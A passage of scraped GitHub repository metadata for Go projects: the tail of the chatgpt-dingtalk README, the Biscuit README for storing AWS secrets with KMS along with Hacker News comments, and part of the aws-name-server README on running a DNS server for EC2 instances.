\"atUsers\": [\n {\n \"dingtalkId\": \"xxx\",\n \"staffId\":\"xxx\"\n }\n ],\n \"chatbotCorpId\": \"dinge8a565xxxx\",\n \"chatbotUserId\": \"$:LWCP_v1:$Cxxxxx\",\n \"msgId\": \"msg0xxxxx\",\n \"senderNick\": \"eryajf\",\n \"isAdmin\": true,\n \"senderStaffId\": \"user123\",\n \"sessionWebhookExpiredTime\": 1613635652738,\n \"createAt\": 1613630252678,\n \"senderCorpId\": \"dinge8a565xxxx\",\n \"conversationType\": \"2\",\n \"senderId\": \"$:LWCP_v1:$Ff09GIxxxxx\",\n \"conversationTitle\": \"\u673a\u5668\u4eba\u6d4b\u8bd5-TEST\",\n \"isInAtList\": true,\n \"sessionWebhook\": \"https://oapi.dingtalk.com/robot/sendBySession?session=xxxxx\",\n \"text\": {\n \"content\": \" \u4f60\u597d\"\n },\n \"msgtype\": \"text\"\n}'\n```\n\n\u5982\u679c\u624b\u52a8\u8bf7\u6c42\u6ca1\u6709\u95ee\u9898\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u5728\u9489\u9489\u7fa4\u91cc\u4e0e\u673a\u5668\u4eba\u8fdb\u884c\u5bf9\u8bdd\u4e86\u3002\n\n`\u5e2e\u52a9\u5217\u8868`\n\n> \u827e\u7279\u673a\u5668\u4eba\u53d1\u9001\u7a7a\u5185\u5bb9\u6216\u8005\u5e2e\u52a9\uff0c\u4f1a\u8fd4\u56de\u5e2e\u52a9\u5217\u8868\u3002\n\n![image_20230216_221253](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230216_221253.png)\n\n`\u5207\u6362\u6a21\u5f0f`\n\n> \u53d1\u9001\u6307\u5b9a\u5173\u952e\u5b57\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u6a21\u5f0f\u3002\n\n![image_20230215_184655](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230215_184655.png)\n\n> \ud83d\udce2 \u6ce8\u610f\uff1a\u4e32\u804a\u6a21\u5f0f\u4e0b\uff0c\u7fa4\u91cc\u6bcf\u4e2a\u4eba\u7684\u804a\u5929\u4e0a\u4e0b\u6587\u662f\u72ec\u7acb\u7684\u3002\n> \ud83d\udce2 \u6ce8\u610f\uff1a\u9ed8\u8ba4\u5bf9\u8bdd\u6a21\u5f0f\u4e3a\u5355\u804a\uff0c\u56e0\u6b64\u4e0d\u5fc5\u53d1\u9001\u5355\u804a\u5373\u53ef\u8fdb\u5165\u5355\u804a\u6a21\u5f0f\uff0c\u800c\u8981\u8fdb\u5165\u4e32\u804a\uff0c\u5219\u9700\u8981\u53d1\u9001\u4e32\u804a\u5173\u952e\u5b57\u8fdb\u884c\u5207\u6362\uff0c\u5f53\u4e32\u804a\u5185\u5bb9\u8d85\u8fc7\u6700\u5927\u9650\u5236\u7684\u65f6\u5019\uff0c\u4f60\u53ef\u4ee5\u53d1\u9001\u91cd\u7f6e\uff0c\u7136\u540e\u518d\u6b21\u8fdb\u5165\u4e32\u804a\u6a21\u5f0f\u3002\n\n`\u5b9e\u9645\u804a\u5929\u6548\u679c\u5982\u4e0b`\n\n![image_20221209_163739](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163739.png)\n\n---\n\n\u5982\u679c\u4f60\u60f3\u901a\u8fc7\u547d\u4ee4\u884c\u76f4\u63a5\u90e8\u7f72\uff0c\u53ef\u4ee5\u76f4\u63a5\u4e0b\u8f7drelease\u4e2d\u7684[\u538b\u7f29\u5305](https://github.com/eryajf/chatgpt-dingtalk/releases) \uff0c\u8bf7\u6839\u636e\u81ea\u5df1\u7cfb\u7edf\u4ee5\u53ca\u67b6\u6784\u9009\u62e9\u5408\u9002\u7684\u538b\u7f29\u5305\uff0c\u4e0b\u8f7d\u4e4b\u540e\u76f4\u63a5\u89e3\u538b\u8fd0\u884c\u3002\n\n\u4e0b\u8f7d\u4e4b\u540e\uff0c\u5728\u672c\u5730\u89e3\u538b\uff0c\u5373\u53ef\u770b\u5230\u53ef\u6267\u884c\u7a0b\u5e8f\uff0c\u4e0e\u914d\u7f6e\u6587\u4ef6\uff1a\n\n```\n$ tar xf chatgpt-dingtalk-v0.0.4-darwin-arm64.tar.gz\n$ cd chatgpt-dingtalk-v0.0.4-darwin-arm64\n$ cp config.dev.json # \u6839\u636e\u60c5\u51b5\u8c03\u6574\u914d\u7f6e\u6587\u4ef6\u5185\u5bb9\n$ ./chatgpt-dingtalk # \u76f4\u63a5\u8fd0\u884c\n\n# \u5982\u679c\u8981\u5b88\u62a4\u5728\u540e\u53f0\u8fd0\u884c\n$ nohup ./chatgpt-dingtalk &> run.log &\n$ tail -f run.log\n```\n\n\n## \u672c\u5730\u5f00\u53d1\n\n```sh\n# \u83b7\u53d6\u9879\u76ee\n$ git clone https://github.com/eryajf/chatgpt-dingtalk.git\n\n# \u8fdb\u5165\u9879\u76ee\u76ee\u5f55\n$ cd chatgpt-dingtalk\n\n# \u590d\u5236\u914d\u7f6e\u6587\u4ef6\uff0c\u6839\u636e\u4e2a\u4eba\u5b9e\u9645\u60c5\u51b5\u8fdb\u884c\u914d\u7f6e\n$ cp config.dev.json config.json\n\n# \u542f\u52a8\u9879\u76ee\n$ go run main.go\n```\n\n## \u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\n\n```json\n{\n \"api_key\": \"xxxxxxxxx\", // openai api_key\n \"session_timeout\": 600 // \u4f1a\u8bdd\u8d85\u65f6\u65f6\u95f4,\u9ed8\u8ba4600\u79d2,\u5728\u4f1a\u8bdd\u65f6\u95f4\u5185\u6240\u6709\u53d1\u9001\u7ed9\u673a\u5668\u4eba\u7684\u4fe1\u606f\u4f1a\u4f5c\u4e3a\u4e0a\u4e0b\u6587\n}\n```\n\n## \u5e38\u89c1\u95ee\u9898\n\n\u4e00\u4e9b\u5e38\u89c1\u7684\u95ee\u9898\uff0c\u6211\u5355\u72ec\u5f00issue\u653e\u5728\u8fd9\u91cc\uff1a[\u70b9\u6211](https://github.com/eryajf/chatgpt-dingtalk/issues/44)\uff0c\u53ef\u4ee5\u67e5\u770b\u8fd9\u91cc\u8f85\u52a9\u4f60\u89e3\u51b3\u95ee\u9898\uff0c\u5982\u679c\u91cc\u8fb9\u6ca1\u6709\uff0c\u8bf7\u5bf9\u5386\u53f2issue\u8fdb\u884c\u641c\u7d22(\u4e0d\u8981\u63d0\u4ea4\u91cd\u590d\u7684issue)\uff0c\u4e5f\u6b22\u8fce\u5927\u5bb6\u8865\u5145\u3002\n\n## \u9ad8\u5149\u65f6\u523b\n\n> \u672c\u9879\u76ee\u66fe\u5728[2022-12-12](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-12.md#go),[2022-12-18](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-18.md#go),[2022-12-19](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-19.md#go),[2022-12-20](https://github.com/bonfy/github-trending/blob/master/2022/2022-12-20.md#go),[2023-02-09](https://github.com/bonfy/github-trending/blob/master/2023-02-09.md#go),[2023-02-10](https://github.com/bonfy/github-trending/blob/master/2023-02-10.md#go),[2023-02-11](https://github.com/bonfy/github-trending/blob/master/2023-02-11.md#go),[2023-02-12](https://github.com/bonfy/github-trending/blob/master/2023-02-12.md#go)\uff0c\u8fd9\u4e9b\u5929\u91cc\uff0c\u767b\u4e0aGitHub Trending\u3002\u800c\u4e14\u8fd8\u5728\u6301\u7eed\u767b\u699c\u4e2d\uff0c\u53ef\u89c1\u6700\u8fd1openai\u7684\u70ed\u5ea6\u3002\n> ![image_20230215_094034](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20230215_094034.png)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dcoker/biscuit", "link": "https://github.com/dcoker/biscuit", "tags": [], "stars": 556, "description": "Biscuit is a multi-region HA key-value store for your AWS infrastructure secrets.", "lang": "Go", "repo_lang": "", "readme": "> :warning: **Biscuit is no longer maintained.** Do not use Biscuit on new projects.\n\n# Biscuit\n\n[![Build Status](https://travis-ci.org/dcoker/biscuit.svg)](https://travis-ci.org/dcoker/biscuit)\n\nBiscuit is a simple key-value store for your infrastructure secrets.\n\n\n## Is Biscuit right for me?\n\nBiscuit is most useful to teams already using AWS and IAM to manage their \ninfrastructure. If that describes your team, then Biscuit might be useful to \nyou if you answer \"yes\" to any of these questions:\n\n* Do you live in constant fear of accidentally committing infrastructure secrets to source control?\n* Do you commit private keys to your source repository?\n* Do you share passwords with other developers?\n* Do you want to manage secrets securely across multiple regions?\n\n### Features\n\n* Provides a simple key/value CLI to secure storage.\n* Secrets can live alongside with your code in source control.\n* Operates with KMS keys across multiple regions.\n* Facilitates management of AWS IAM Policies, KMS Policies, and KMS Grants across multiple regions.\n* Local encryption using AES-GCM-256 or Secretbox (NaCL).\n* Offline mode: Using the \"testing\" key manager, you can use Biscuit in\n test environments without changing your code and without network \n dependencies.\n\n### Feature Comparison\n\n| Package | Requires a server? | Multi-region | HA | Rotation | Storage | AWS KMS | Principals | Web UI |\n|:----------------------------------------------------|:-------------------|:-------------|:----|:---------|:---------|:---------|:-----------|:-------|\n| Biscuit | No | Yes | Yes | No | File | Required | AWS Only | No |\n| [Credstash](https://github.com/fugue/credstash) | No | No | Yes | No | DynamoDB | Required | AWS Only | No |\n| [Lyft Confidant](https://github.com/lyft/confidant) | Yes | No | No | No | DynamoDB | Required | AWS Only | Yes |\n| [Hashicorp Vault](https://www.vaultproject.io) | Yes | Yes | Yes | Yes | Varied | Optional | Multiple | No |\n\n## Quick Start\n\n### Installing\n\n#### Downloading\n\nSee [releases](https://github.com/dcoker/biscuit/releases) for the latest release.\n\n#### Building from Source\n\nIf you have Golang 1.16+ installed, you can install with:\n\n```\ngo get -v github.com/dcoker/biscuit\n```\n\n### Setup\n\n```shell\n# Verify that your AWS credentials are readable.\nbiscuit kms get-caller-identity\n\n# Provision a KMS Key w/useful defaults in us-east-1, us-west-1, \n# and us-west-2 and create a secrets.yml file.\nbiscuit kms init -f secrets.yml\n\n# Store the launch codes.\nbiscuit put -f secrets.yml -- launch_codes 0000\n\n# Decrypt the launch codes.\nbiscuit get -f secrets.yml launch_codes\n```\n\nNext steps: examine `secrets.yml` in your favorite text editor, and run \n`biscuit --help` to learn about additional commands.\n\n### Uninstalling\n\nDone already?\n\nThe `biscuit kms init` step above may have created a KMS Key and some\nassociated policies using CloudFormation. You can remove those by\nrunning:\n\n```shell\nbiscuit kms deprovision\nrm secrets.yml\n```\n\nNote: any biscuit files you created before deprovisioning will no longer\nbe readable.\n\n### Glossary\n\nThe **secret** is the plaintext value which you wish to protect.\n\nA **label** is a short alphanumeric string that identifies a set of keys\nacross multiple AWS regions. It is present in CloudFormation stack names\n(`biscuit-label`) and in KMS key aliases (`alias/biscuit-label`).\n\nThe **key manager** is responsible for the provisioning of encryption\nkeys. The encryption keys generated by the key manager are used to\nencrypt the **secret**. An encrypted version of the encryption key -- \ndecryptable only by KMS -- is stored as the **key ciphertext**.\n\nSecret **values** consist of the information necessary for the **key\nmanager** to provide the plaintext encryption key to decrypt a\n**ciphertext** for a named secret. Values consist of a Key ID (a\nstring, meaningful to the key manager), an indicator of which key manager is\nin use (string), an algorithm (string), the key ciphertext (the\nencrypted key, base64), and the ciphertext (base 64). Here is an example\nof a value named `api_key`:\n\n```yaml\napi_key:\n- key_id: arn:aws:kms:us-west-1:123456789012:key/37793df5-ad32-4d06-b19f-bfb95cee4a35\n key_manager: kms\n algorithm: secretbox\n key_ciphertext: CiA3edlKfUWXVgiDDuzbz95S/pkM8grwRsYkjRoURv0LGhKnAQEBAQB4N3nZSn1Fl1YIgw7s28/eUv6ZDPIK8EbGJI0aFEb9CxoAAAB+MHwGCSqGSIb3DQEHBqBvMG0CAQAwaAYJKoZIhvcNAQcBMB4GCWCGSAFlAwQBLjARBAw4OEtFZrisfC3xJHACARCAO+HJpH4bWD/MF9BYjBvl5ztcezTNxo5SPeAOKJ3Z8Pff2vh1uCZhEEjxnF7t1tqTma8oeESuu2vpPiZp\n ciphertext: YsI/4Qnzpu+Vm+JP4LhnO8Y3dSoz61/vKHBXGVI1pVAUCjMhvjb9ohcdjA==\n```\n\n**Names** identify a value. When using AWS KMS, names are\nencoded into the **encryption context** and must be provided by the\nprocess that decrypts the value.\n\nA key **template** is a special entry in the .yml file which tells the\nbiscuit tool how to handle values that are added to that file. This is\nan example template:\n\n```yaml\n_keys:\n- key_id: arn:aws:kms:us-west-1:123456789012:key/37793df5-ad32-4d06-b19f-bfb95cee4a35\n key_manager: kms\n algorithm: secretbox\n- key_id: arn:aws:kms:us-west-2:123456789012:key/c0045b15-9880-4b17-84da-a35760e8a16f\n key_manager: kms\n algorithm: secretbox\n- key_id: arn:aws:kms:us-east-1:123456789012:key/d1c5a8e3-adfb-4f79-af0b-cde9f1a31292\n key_manager: kms\n algorithm: secretbox\n```\n\n## IAQ\n\n### How much does this cost?\n\nBiscuit requires one key in each region you wish to use. Most users can\nexpect to pay ~$1/mo per region per label, and additional usage charges\nfor heavy users. See\n[AWS Key Management Service Pricing](https://aws.amazon.com/kms/pricing/)\nfor pricing.\n\n### Can I use it in a single AWS region?\n\nYes. Use the `-r` flag or the `BISCUIT_REGIONS` environment variable to specify\nthe region.\n\nExample:\n\n```shell\nbiscuit kms init -r us-west-2 -f secrets.yml\n```\n\n### What do I do with the .yml file after it is created?\n\nThe .yml file is safe for committing to version control, your CI system,\nembedding in native binaries, copying to S3, publishing in a newspaper,\netc. You can deploy these to your production servers by whatever\nmechanism is most appropriate for your environment, but by far the\neasiest way to start is to simply include it in your deployments in the\nsame way you would a configuration file.\n\n### Once I've created a value, how do I let AWS resources decrypt it?\n\nYou can use KMS Grants, KMS Key Policies, or IAM Policies to manage access \nto the secrets.\n\n#### KMS Grants\n\nKMS Grants enable you to delegate access to specific KMS operations to some\nAWS principal. Often your AWS resources will be running with an IAM Role, and \nthus often the easiest thing to do is to use KMS Grants to allow your IAM Roles\nto decrypt the appropriate values.\n\nBiscuit will create and retire those grants for you.\n\nHere's how to grant role/webserver and user/gordon the ability to decrypt the launch codes:\n\n```shell\nbiscuit kms grants create --grantee-principal role/webserver -f secrets.yml launch_codes\nbiscuit kms grants create --grantee-principal user/gordon -f secrets.yml launch_codes\nbiscuit kms grants list -f secrets.yml launch_codes\n```\n\nIf you wish to allow a principal to decrypt all values encrypted under the same set of keys as\nthe launch codes, you can pass the `--all-names` flag:\n\n```shell\nbiscuit kms grants create -g role/webserver -f secrets.yml --all-names launch_codes\n```\n\nYou can also retire grants when they are no longer useful:\n\n```shell\nbiscuit kms grants list -f secrets.yml launch_codes\nbiscuit kms grants retire -f secrets.yml --grant-name biscuit-ff8102edc8 launch_codes\n```\n\nBiscuit manages grants using the KMS [CreateGrant](http://docs.aws.amazon.com/kms/latest/APIReference/API_CreateGrant.html),\n[ListGrants](http://docs.aws.amazon.com/kms/latest/APIReference/API_ListGrants.html), and \n[RetireGrant](http://docs.aws.amazon.com/kms/latest/APIReference/API_RetireGrant.html) APIs.\n\n#### KMS Key Policies\n\nKMS Keys have their own policies. See \n[Key Policies](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html) \nfor more details. If you have just a few users, this is possibly the easiest\nmechanism to use to control access. You can run `biscuit kms edit-key-policy` to \nedit the policy document across all of your regions at once.\n\nBiscuit manages Key Policies using the KMS [GetKeyPolicy](http://docs.aws.amazon.com/kms/latest/APIReference/API_GetKeyPolicy.html) \nand [SetKeyPolicy](http://docs.aws.amazon.com/kms/latest/APIReference/API_SetKeyPolicy.html) APIs.\n\n#### IAM Policies\n\nIAM Policies are attached to a myriad of AWS entities, and they can also be \nused to enable access to KMS operations. See \n[Key Policies](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html) for more details.\n\nExample: You have a server running with a static AWS access key and secret key. You can give that\nserver the ability to decrypt all values encrypted under a set of keys by attaching a standard user policy, \nspecifying `kms:Decrypt` as the Action and the full key ARNs in the Resource field.\n\nNote: IAM Policies are global entities, whereas KMS Keys are unique per region. Thus if you have a 3-region \nconfiguration, any IAM Policies that explicitly grant access to KMS Keys will need to list all 3 \nregion-specific key ARNs.\n\nBiscuit does not manage IAM Policies for you. \n\nIf you wish to disallow IAM Policies from controlling access to your keys,\nyou can do so by passing `--disable-iam-policies` to `kms init`. When IAM\nPolicies are disabled, the only way to control access to keys is via Grants and KMS Key \nPolicies. For more information on how this works, see the CloudFormation \ntemplate in the source repository and the Key Policies doc linked above.\n\n### How do I control which AWS region is used to decrypt the values?\n\nEach AWS region has its own isolated KMS instance. This means that KMS keys\nare per-region resources, and using a KMS key requires communicating with the KMS\nservice in the region that holds that key.\n\nWhen encrypting, Biscuit will attempt to encrypt the secrets by using all of\nthe KMS instances corresponding to the regions of the keys it is told to use.\nThis can incur cross-datacenter traffic and is slower than using only the\nclosest region.\n\nWhen decrypting, Biscuit only needs to decrypt under one of the keys. By\ndefault, Biscuit will prioritize using keys that are in the same region that\nthe caller is in. This is determined by the `AWS_REGION` environment variable.\nIf you do not have an `AWS_REGION` variable set, Biscuit will process keys in\nthe order that they appear in the .yaml file.\n\nYou can override this behavior by passing a `--aws-region-priority` flag to the\n`get` or `export` operations. Here is an example invocation which prioritizes\nkeys in ap-north-1 and us-west-2:\n\n```shell\nbiscuit get --aws-region-priority ap-north-1,us-west-2 -f secrets.yml launch_codes\n```\n\nWe recommend you make arrangements on your EC2 instances to either set the\n`AWS_REGION` flag, or pass a latency-ordered list of regions via the\n`--aws-region-priority` flag.\n\n\n### How do I keep my development and production keys separate?\n \nBiscuit tracks keys across regions by using a label. Labels are embedded \ninto the name of the CloudFormation stack and a KMS Key Alias in each region. \nThe default behavior is to use the `default` label, but you can change this \nby passing the `-l` flag. Example: `biscuit kms init -l development`\n \nLabels are not persisted with the values and are not visible in the .yml \nfiles. They are an organizational tool to facilitate managing keys across \nregions, and are passed as parameters to various commands.\n\nHere are some common scenarios:\n\n```shell\n# Create key in a single-region, and allow developers to do whatever they want. \nbiscuit kms init -r us-west-2 -l development -f development.yml --administrators role/developers --users role/developers\nbiscuit put -f development.yml ssl_key -i selfsigned.key\n\n# Create keys in three regions, and allow a limited set of people to administer it,\n# and allow developers (and gordon) to read and write the secrets.\nbiscuit kms init -l production -f production.yml --administrators role/prod-keymaster --users role/developers,user/gordon\nbiscuit put -f production.yml ssl_key -i wildcard.key\n\n# Create a file that doesn't use encryption at all.\nbiscuit put -f unittest.yml -a none -- database_password testing\n```\n\n### What's the difference between an \"administrator\" and a \"user\"?\n\nBiscuit installs a KMS Key Policy similar to the default policy \nrecommended by AWS. This creates a distinction between \n[\"administrators\"](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html#key-policy-default-allow-administrators) \nand [\"users\"](http://docs.aws.amazon.com/kms/latest/developerguide/key-policies.html#key-policy-default-allow-users).\n\nAdministrators can administer the key but not necessarily encrypt or decrypt \nwith that key. They could, if they wished, replace the key policy with one \nthat does allow them encrypt and decrypt, but that would be unusual.\n\nUsers can encrypt, decrypt, and generate ephemeral data keys. In most \ncases, you'll want to make your development team a \"user\" and \npossibly also \"administrators\". \n\nIf you use `biscuit kms init` to create your keys, you can use the \n`--administrators` and `--users` flag to set membership. If you have already\ncreated the keys but want to change the policy, use the interactive\n`biscuit kms edit-key-policy` to apply changes to all regions simultaneously.\n\n### What is the minimum IAM Policy needed to run `kms init`?\n\nThe IAM Policy below is the smallest set of permissions needed to get\nstarted with Biscuit using `kms init`. Be sure to replace the account \nnumber `123456789012` with your own.\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"AllowKmsListAliasesAndCreateKey\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:ListAliases\",\n \"kms:CreateKey\"\n ],\n \"Resource\": [\n \"*\"\n ]\n },\n {\n \"Sid\": \"AllowKmsCreateAlias\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:CreateAlias\"\n ],\n \"Resource\": [\n \"arn:aws:kms:*:123456789012:alias/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowKmsDeleteAlias\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:DeleteAlias\"\n ],\n \"Resource\": [\n \"arn:aws:kms:*:123456789012:alias/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowCloudFormationCreate\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"cloudformation:DescribeStacks\",\n \"cloudformation:CreateStack\",\n \"cloudformation:DeleteStack\"\n ],\n \"Resource\": [\n \"arn:aws:cloudformation:*:123456789012:stack/biscuit-*\"\n ]\n },\n {\n \"Sid\": \"AllowCloudFormationDelete\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"cloudformation:DeleteStack\"\n ],\n \"Resource\": [\n \"arn:aws:cloudformation:*:123456789012:stack/biscuit-*\"\n ]\n }\n ]\n}\n```\n\n### Does Biscuit support multi-factor authentication?\n\nYes. IAM Policies and the KMS Key Policies support the `aws:MultiFactorAuthPresent` condition.\n\nBiscuit does not enforce any access control on its own. All enforcement is\nimplemented by AWS. Any features that are available in the IAM Policies, KMS Key \nPolicy documents, or KMS Grants are available to you. \n\nBiscuit does not expose command line flags to use all of the features, but you \ncan edit the various policies after they are created, or override the default \nCloudFormation template.\n\nBiscuit is known to work well with [awsmfa](https://pypi.python.org/pypi/awsmfa).\n\n### I manually edited the .yaml file and changed the name of a value and now it won't decrypt. What's wrong?\n\nThe `kms` key manager annotates the ciphertext with an\n[EncryptionContext](http://docs.aws.amazon.com/kms/latest/developerguide/encryption-context.html)\ncontaining the name of the value. If you change the name of a value,\nthen the decrypting process will provide the wrong name to the decrypt\noperation and the decrypt will fail. If you wish to change the name of a\nsecret, re-encrypt it using the new name instead.\n\n### I want to change something about the CloudFormation template. What do I do?\n\nThe `biscuit kms init` command allows you to override the built-in\nCloudFormation template with your own via the\n`--cloudformation-template-url` parameter. \n\n### My account administrator does not let me create CloudFormation stacks, help!\n\nThe only expectations that Biscuit has about your KMS configuration is that the \nkeys have aliases of the form `alias/biscuit-{label}` and that you have sufficient \npermissions to operate on the KMS keys. You can create the keys using whatever\nprocess is compatible with your organization's policies.\n\n### How do I rotate the values?\n\nBiscuit considers the rotation of secrets (such as database passwords)\nto be application-specific features and thus does not have any native\nsupport for it. However, you can\nimplement a rotation scheme appropriate for your situation simply by\nserializing that state as the secret and then read it with your \napplication-specific rotation behaviors. \n\nHere is an example using JSON and [jq](https://stedolan.github.io/jq/):\n\n```shell\nbiscuit put -f secrets.yml -- database_passwords '{\"1\": \"pass1\", \"2\": \"pass2\"}'\nbiscuit get -f secrets.yml database_passwords | jq -r '.[to_entries | map(.key) | map(tonumber) | max | tostring]'\n```\n\n", "readme_type": "markdown", "hn_comments": "This is also similiar to Sneaker (https://github.com/codahale/sneaker), which is written in Go. It doesn't copy to other regions by default, but it's not hard to handle that on your own. This also uses KMS, but stores encrypted secrets in S3.The project is nice, but I'm gonna have to stick with Vault as I like the flexibility of storage backends and not locked into AWS for enterprise-y apps that can't go to AWS.It looks like this is fairly similar to Mozilla sops[1].[1]https://github.com/mozilla/sopsSomewhat off-topic, but I read dcoker's username as docker at first and was fairly confused as to why docker was producing something like this just for AWS.Why no key rotation? I'd be very careful with something that doesn't rotate keys.I feel like this problem is already solved with iam ec2 instance roleshttp://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles...At work we use chef to deploy our credentials via KML flat files on the servers that require them. Works rather well.I prefer credstash (https://github.com/fugue/credstash) which uses KMS and stores encrypted values in dynamodb. It has built in ansible support via lookups too!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ConradIrwin/aws-name-server", "link": "https://github.com/ConradIrwin/aws-name-server", "tags": [], "stars": 556, "description": "DNS server that lets you look up ec2 instances by instance name", "lang": "Go", "repo_lang": "", "readme": "A DNS server that serves up your ec2 instances by name.\n\nUsage\n=====\n\n```\naws-name-server --domain aws.bugsnag.com \\\n --aws-region us-east-1 \\\n --aws-access-key-id \\\n --aws-secret-access-key \n```\n\nThis will serve up DNS records for the following:\n\n* `.aws.bugsnag.com` all your EC2 instances tagged with Name=<name>\n* `..aws.bugsnag.com` the nth instances tagged with Name=<name>\n* `.role.aws.bugsnag.com` all your EC2 instances tagged with Role=<role>\n* `..role.aws.bugsnag.com` the nth instances tagged with Role=<role>\n* `.aws.bugsnag.com` all your EC2 instances by instance id.\n* `..aws.bugsnag.com` all your EC2 instances by instance id.\n\nIt uses CNAMEs so that instances will resolve to internal IP addresses if you query from inside AWS,\nand external IP addresses if you query from the outside.\n\nQuick start\n===========\n\nThere's a long-winded [Setup guide](#setup), but if you already know your way\naround EC2, you'll need to:\n\n1. Open up port 53 (UDP and TCP) on your security group.\n2. Boot an instance with an IAM Role with `ec2:DescribeInstances` permission. (or use an IAM user and\n configure `aws-name-server` manually).\n3. Install `aws-name-server`.\n4. Setup your NS records correctly.\n\nParameters\n==========\n\n### `--domain`\n\nThis is the domain you wish to serve. i.e. `aws.example.com`. It is the\nonly required parameter.\n\n### `--hostname`\n\nThe publically resolvable hostname of the current machine. This defaults\nsensibly, so you only need to set this if you see a warning in the logs.\n\n### `--aws-access-key-id` and `--aws-secret-access-key`\n\nAn Amazon key pair with permission to run `ec2:DescribeInstances`. This defaults to\nthe IAM role of the machine running `aws-name-server` or to the values of the environment\nvariables `$AWS_ACCESS_KEY_ID` and `$AWS_SECRET_ACCESS_KEY` (or `$AWS_ACCESS_KEY` and `$AWS_SECRET_KEY`).\n\n### `--aws-region`\n\nThis defaults to the region in which `aws-name-server` is running, or `us-east-1`.\n\nSetup\n=====\n\nThese instructions assume you're going to launch a new EC2 instance to run\n`aws-name-server`. If you want to run it on an existing server, adapt the\ninstructions to suit.\n\n### 1. Create an IAM role\n\n[IAM Roles](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html)\nlet you give EC2 instances permission to access the AWS API. We will need our\ndns machine to run `ec2:DescribeInstances`.\n\n1. Log into the AWS web console and navigate to IAM.\n2. Create a new role called *iam-role-aws-name-server*\n3. Select the *Amazon EC2* role type.\n4. Create a *Custom Policy* called *describe-instances-only* with the content:\n\n ```\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Action\": [\"ec2:DescribeInstances\"],\n \"Effect\": \"Allow\",\n \"Resource\": \"*\"\n }]\n }\n ```\n\n### 2. Create a security group\n\n[Security groups](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html)\ndescribe what traffic is allowed to get to your instance. DNS servers use UDP port 53 and TCP port 53.\n\n1. Log into the AWS web console and navigate to EC2.\n2. Create a new security group called *aws-name-server*\n3. Configure it to have:\n\n ```\n # Type # Protocol # Port # Source\n SSH TCP 22 My IP x.x.x.x/32\n DNS UDP 53 Anywhere 0.0.0.0/0\n Custom TCP 53 Anywhere 0.0.0.0/0\n ```\n\nThis will let you ssh in to the DNS server, and let anyone run DNS queries.\n\n### 3. Launch an instance\n\nI recommend running 64bit HVM-based EBS-backed Ubuntu 14.04 on a `t2.micro`\n([ami-acff23c4](https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-acff23c4)). You\ncan use whatever distro you like the most.\n\n1. Log into the AWS web console and navigate to EC2.\n2. Click \"Launch Instance\"\n3. Select your favourite AMI (e.g. *ami-acff23c4*).\n3. Select your favourite cheap instance type (e.g. *t2.micro*) (If you don't have VPCs yet, choose *t1.micro* instead)\n4. Set IAM role to *iam-role-aws-name-server*\n5. Skip through disks (the default is fine)\n6. Skip through tags (though if you set Name=dns1 and Role=dns you can test the server :)\n7. Select an existing security group `sg-aws-name-server`.\n8. Launch!\n\n### 4. Install the binary\n\n1. Download the [latest version](http://gobuild.io/download/github.com/ConradIrwin/aws-name-server/master).\n\n ```\n wget http://gobuild.io/github.com/ConradIrwin/aws-name-server/master/linux/amd64 -O aws-name-server.zip\n unzip aws-name-server.zip\n ```\n\n2. Move the binary into /usr/bin.\n\n ```\n sudo cp aws-name-server /usr/bin\n sudo chmod +x /usr/bin/aws-name-server\n ```\n\n3. (optional) Set the capabilities of aws-name-server so it doesn't need to run as root.\n\n ```\n # the cap_net_bind_service capability allows this program to bind to ports below 1024\n # when it us run as a non-root user.\n sudo setcap cap_net_bind_service=+ep /usr/bin/aws-name-server\n ```\n\n### 5. Configure upstart.\n\nIf you use upstart (the default process manager under ubuntu) you can use the provided upstart\nscript. You'll need to change the script to reflect your hostname:\n\n1. Open upstart/aws-name-server.conf and change --domain=internal to --domain <your-domain>\n2. `sudo cp upstart/aws-name-server.conf /etc/init/`\n3. `sudo initctl start aws-name-server`\n\n### 6. Configure NS Records\n\nTo add your DNS server into the global DNS tree, you need to add an `NS` record\nfrom the parent domain to your new server.\n\nLet's say you currently have DNS for `example.com`, and you're running\n`aws-name-server` on the machine `ec2-12-34-56-78.compute-1.amazonaws.com`. In\nthe admin page for `example.com`s DNS add a new record of the form:\n\n```\n# name # ttl # value\naws.example.com 300 IN NS ec2-12-34-56-78.compute-1.amazonaws.com\n```\n\nThe TTL can be whatever you want, I like 5 minutes because it's not too long to wait if I make a mistake.\n\nThe value should be a hostname for your server that is directly resolvable (i.e. not a CNAME). The public\nhostnames that Amazon gives instances are perfect for this.\n\nTroubleshooting\n===============\n\nThere's a lot that can go wrong, so troubleshooting takes a while.\n\n### Did it start?\n\nFirst try looking in the logs (`/var/log/upstart/aws-name-server.log` if you're\nusing upstart). If there's nothing there, then try `/var/log/syslog`.\n\n### Is it running?\nTry running `dig dns1.aws.example.com @localhost` while ssh'd into the machine.\nIt should return a `CNAME` record. If not, look in the logs, the chances 